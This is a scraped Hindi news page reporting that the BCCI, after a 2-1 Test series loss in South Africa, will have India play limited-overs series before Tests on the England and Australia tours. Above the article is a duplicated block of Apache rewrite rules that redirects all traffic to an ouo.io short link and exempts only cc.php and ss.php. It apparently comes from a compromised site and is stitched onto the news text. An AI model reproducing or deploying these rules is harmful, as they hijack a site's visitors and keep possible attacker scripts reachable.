
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 574
Previous Nextनई दिल्ली। दक्षिण अफ्रीका दौरे पर टेस्ट सीरीज में 2-1 से मिली हार से सबक लेते हुए भारतीय क्रिकेट बोर्ड ने अब एक बड़ा और अहम फैसला लिया है। दरअसल, भारतीय टीम अब विदेशी दौरों पर टेस्ट सीरीज से पहले सीमित ओवरों की श्रृंखला खेलेगी, ताकि खिलाड़ियों को वहां के माहौल में ढलने का समय मिल सके और वे वहां की परिस्थितियों से तालमेल बिठा सकें।
बीसीसीआई के सीईओ राहुल जौहरी ने कहा कि इस समस्या का हल निकाल लिया गया है और अब जब इंग्लैंड और ऑस्ट्रेलिया दौरे पर भारतीय टीम जाएगी तो पहले सीमित ओवरों की श्रृंखला खेलेगी। जौहरी ने कहा कि टीम मैनेजमेंट से हमें जो फीडबैक मिला है वो एक गंभीर मुद्दा है। भारतीय टीम को अगला विदेशी दौरा इंग्लैंड का करना है और हम वहां एक महीने पहले पहुंचेंगे। भारतीय टीम पहले सीमित ओवरों की सीरीज के खेलेगी उसके बाद टेस्ट सीरीज खेलेगी। इससे टीम वहां की परिस्थितियों में भलीभांति ढल जाएगी। राहुल जौहरी ने आगे कहा कि सर्दियों में भारतीय टीम को ऑस्ट्रेलिया का दौरा करना है। क्रिकेट ऑस्ट्रेलिया और भारतीय क्रिकेट बोर्ड के साथ एक समझौता हुआ है कि भारतीय टीम टेस्ट मैच से पहले सीमित ओवरों की सीरीज खेलेगी। इसका फायदा ये होगा कि टीम को वहां के माहौल में ढलने का समय मिल सकेगा। उन्होंने ये भी बताया कि भारतीय टीम के फ्यूचर टूर प्रोग्राम को एडवांस में ही बता दिया जाएगा। उन्होंने कहा कि अभी 4 सालों की एफटीपी चलती है। इस पीरियड में हमने कुछ बदलाव किए हैं लेकिन अब आप पहली बार दिन और तारीख के हिसाब से भारतीय टीम के दौरों का कैलेंडर देखेंगे। तो आपको अगले 5 साल का कार्यक्रम पहले से ही पता होगा।